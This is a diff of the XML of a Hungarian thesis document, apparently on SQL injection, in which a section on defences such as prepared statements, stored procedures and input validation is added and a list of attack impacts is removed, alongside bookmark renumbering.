+        <w:t xml:space="preserve"> elkerülése </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>meglepően</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">egyszerű, </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">szembekerülve azzal a ténnyel, milyen sok </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>hasonló</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> fajta támadás fordul elő</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>A biztonsági rések megelőzésére is több lehetőség van.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Stlus3"/>
         <w:numPr>
           <w:ilvl w:val="0"/>
-          <w:numId w:val="9"/>
+          <w:numId w:val="0"/>
         </w:numPr>
+      </w:pPr>
+      <w:bookmarkStart w:id="12" w:name="_Toc70610880"/>
+      <w:r>
+        <w:t>Elkészített utasítások (prepared statements) használata</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="12"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
         <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:ind w:left="567" w:hanging="283"/>
         <w:jc w:val="both"/>
         <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>érzékeny adatok kiolvasására az adatbázisból,</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Listaszerbekezds"/>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>Az elkészített utasítás egy paraméterezett és újrafelhasználható SQL lekérdezés, amely arra kényszeríti a fejlesztőt, hogy külön írja be az SQL parancsot és a felhasználó által megadott adatokat.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Ez a kódolási stílus lehetővé teszi az adatbázis számára, hogy különbséget tegyen a kód és az adatok között</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:firstLine="567"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>Gyakorlatias példával élve, ha vesszük a</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>boolean-based</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> altípus </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>példáját (7. oldal)</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">akkor </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">a paraméterezett lekérdezés </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">használva az, </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>egy felhasználói azonosítót keresne, amely megegyezik a</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> támadó által megadott</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>karakterlánccal</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>, tehát nem lenne sérülékeny</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:firstLine="1701"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="014A8A75" wp14:editId="69DE57A6">
+            <wp:extent cx="3460750" cy="3980605"/>
+            <wp:effectExtent l="0" t="0" r="6350" b="1270"/>
+            <wp:docPr id="1" name="Kép 1"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId8"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="3460750" cy="3980605"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:firstLine="1276"/>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>1.2.1-es ábra:</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>példák elkészített utasításokra</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>Mike Shema</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>2012</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Stlus3"/>
         <w:numPr>
           <w:ilvl w:val="0"/>
-          <w:numId w:val="9"/>
+          <w:numId w:val="0"/>
         </w:numPr>
+      </w:pPr>
+      <w:bookmarkStart w:id="13" w:name="_Toc70610881"/>
+      <w:r>
+        <w:t>Tárolt eljárások (stored procedures) használata</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="13"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
         <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:ind w:left="567" w:hanging="283"/>
         <w:jc w:val="both"/>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
@@ -3404,168 +6352,288 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>adatbázis béli adatok módosítására (beszúrás, frissítés, törlés),</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Listaszerbekezds"/>
+        <w:t xml:space="preserve">A tárolt eljárások biztonságosan megvalósítva </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>azaz a tárolt eljárás nem tartalmaz semmilyen nem biztonságos dinamikus SQL-t</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">) </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">ugyanolyan hatást gyakorolnak, mint a </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>paraméterezett lekérdezések.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>K</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>ülönbség</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>ük csupán csak annyi</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>, hogy a tárolt eljárás SQL-kódját meghatározzák</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> (</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>a</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">z 1.2.2-es </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>példában</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> az</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>sp_getAccountBalance</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>)</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> és magában az adatbázisban tárolják, majd az alkalmazásból meghívják.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:firstLine="567"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6B98FE05" wp14:editId="36869662">
+            <wp:extent cx="5040000" cy="1629336"/>
+            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
+            <wp:docPr id="3" name="Kép 3"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId9"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5040000" cy="1629336"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:firstLine="709"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">1.2.2-es ábra: </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Java példa tárolt eljárásra </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>SQL Injection Prevention Cheat Sheet</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Stlus3"/>
         <w:numPr>
           <w:ilvl w:val="0"/>
-          <w:numId w:val="9"/>
+          <w:numId w:val="0"/>
         </w:numPr>
+      </w:pPr>
+      <w:bookmarkStart w:id="14" w:name="_Toc70610882"/>
+      <w:r>
+        <w:t>Engedélyezőlista (allow-list) bemenetének ellenőrzése</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="14"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
         <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:ind w:left="567" w:hanging="283"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>adminisztrációs műveletek végrehajtására az adatbázisban (például a DBMS leállítására),</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Listaszerbekezds"/>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Stlus3"/>
         <w:numPr>
           <w:ilvl w:val="0"/>
-          <w:numId w:val="9"/>
+          <w:numId w:val="0"/>
         </w:numPr>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:ind w:left="567" w:hanging="283"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">a DBMS fájlban található adott fájl tartalmának helyreállítására rendszerben, és </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Listaszerbekezds"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="9"/>
-        </w:numPr>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:ind w:left="567" w:hanging="283"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-      </w:pPr>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>egyes esetekben</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> parancsokat ad ki az operációs rendszernek.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Cmsor2"/>
-        <w:numPr>
-          <w:ilvl w:val="1"/>
-          <w:numId w:val="7"/>
-        </w:numPr>
-        <w:spacing w:before="0" w:after="0"/>
-        <w:ind w:left="567" w:hanging="567"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:i w:val="0"/>
-          <w:iCs w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-      </w:pPr>
-      <w:bookmarkStart w:id="10" w:name="_Toc70106701"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:i w:val="0"/>
-          <w:iCs w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>Megelőzési módjai</w:t>
-      </w:r>
-      <w:bookmarkEnd w:id="10"/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Stlus3"/>
-        <w:ind w:left="567" w:hanging="567"/>
-      </w:pPr>
-      <w:bookmarkStart w:id="11" w:name="_Toc70106702"/>
-      <w:r>
-        <w:t>Példa</w:t>
-      </w:r>
-      <w:bookmarkEnd w:id="11"/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:jc w:val="both"/>
+      </w:pPr>
+      <w:bookmarkStart w:id="15" w:name="_Toc70610883"/>
+      <w:r>
+        <w:t>Az összes felhasználó által adott bemenet elkerülése</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="15"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
@@ -3602,11 +6670,11 @@
         <w:spacing w:line="360" w:lineRule="auto"/>
         <w:ind w:left="284" w:hanging="284"/>
       </w:pPr>
-      <w:bookmarkStart w:id="12" w:name="_Toc70106703"/>
+      <w:bookmarkStart w:id="16" w:name="_Toc70610884"/>
       <w:r>
         <w:t>GÉPI TANULÁS</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="12"/>
+      <w:bookmarkEnd w:id="16"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -3618,11 +6686,11 @@
         <w:spacing w:line="360" w:lineRule="auto"/>
         <w:ind w:left="284" w:hanging="284"/>
       </w:pPr>
-      <w:bookmarkStart w:id="13" w:name="_Toc70106704"/>
+      <w:bookmarkStart w:id="17" w:name="_Toc70610885"/>
       <w:r>
         <w:t>PROGRAM FELÉPÍTÉSE</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="13"/>
+      <w:bookmarkEnd w:id="17"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -3634,11 +6702,11 @@
         <w:spacing w:line="360" w:lineRule="auto"/>
         <w:ind w:left="284" w:hanging="284"/>
       </w:pPr>
-      <w:bookmarkStart w:id="14" w:name="_Toc70106705"/>
+      <w:bookmarkStart w:id="18" w:name="_Toc70610886"/>
       <w:r>
         <w:t>EREDMÉNY ÉS ANALÍZIS</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="14"/>
+      <w:bookmarkEnd w:id="18"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -3685,7 +6753,7 @@
           <w:lang w:val="hu-HU"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="15" w:name="_Toc70106706"/>
+      <w:bookmarkStart w:id="19" w:name="_Toc70610887"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -3695,7 +6763,7 @@
         </w:rPr>
         <w:t>Irodalomjegyzék</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="15"/>
+      <w:bookmarkEnd w:id="19"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -3748,7 +6816,7 @@
           <w:lang w:val="hu-HU"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="16" w:name="_Toc70106707"/>
+      <w:bookmarkStart w:id="20" w:name="_Toc70610888"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -3758,7 +6826,7 @@
         </w:rPr>
         <w:t>Nyilatkozat</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="16"/>
+      <w:bookmarkEnd w:id="20"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -3933,7 +7001,7 @@
           <w:lang w:val="hu-HU"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="17" w:name="_Toc70106708"/>
+      <w:bookmarkStart w:id="21" w:name="_Toc70610889"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -3943,7 +7011,7 @@
         </w:rPr>
         <w:t>Köszönetnyilvánítás</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="17"/>
+      <w:bookmarkEnd w:id="21"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -3968,9 +7036,9 @@
       </w:pPr>
     </w:p>
     <w:sectPr>
-      <w:headerReference w:type="default" r:id="rId8"/>
-      <w:footerReference w:type="default" r:id="rId9"/>
-      <w:headerReference w:type="first" r:id="rId10"/>
+      <w:headerReference w:type="default" r:id="rId10"/>
+      <w:footerReference w:type="default" r:id="rId11"/>
+      <w:headerReference w:type="first" r:id="rId12"/>
       <w:pgSz w:w="11906" w:h="16838"/>
       <w:pgMar w:top="1418" w:right="1418" w:bottom="1418" w:left="1418" w:header="709" w:footer="709" w:gutter="567"/>
       <w:cols w:space="708"/>
@@ -4010,7 +7078,6 @@
         <w:docPartUnique/>
       </w:docPartObj>
     </w:sdtPr>
-    <w:sdtEndPr/>
     <w:sdtContent>
       <w:p>
         <w:pPr>
@@ -4343,7 +7410,7 @@
   <w:abstractNum w:abstractNumId="2" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="0B903F65"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
-    <w:tmpl w:val="77B03EA8"/>
+    <w:tmpl w:val="BDDEA24A"/>
     <w:lvl w:ilvl="0" w:tplc="040E0001">
       <w:start w:val="1"/>
       <w:numFmt w:val="bullet"/>
@@ -4356,7 +7423,7 @@
         <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
       </w:rPr>
     </w:lvl>
-    <w:lvl w:ilvl="1" w:tplc="040E0003" w:tentative="1">
+    <w:lvl w:ilvl="1" w:tplc="040E0003">
       <w:start w:val="1"/>
       <w:numFmt w:val="bullet"/>
       <w:lvlText w:val="o"/>
@@ -5162,6 +8229,119 @@
       <w:lvlJc w:val="left"/>
       <w:pPr>
         <w:ind w:left="6764" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="9" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="79BB3A78"/>
+    <w:multiLevelType w:val="hybridMultilevel"/>
+    <w:tmpl w:val="76AE7DE8"/>
+    <w:lvl w:ilvl="0" w:tplc="040E0001">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1287" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
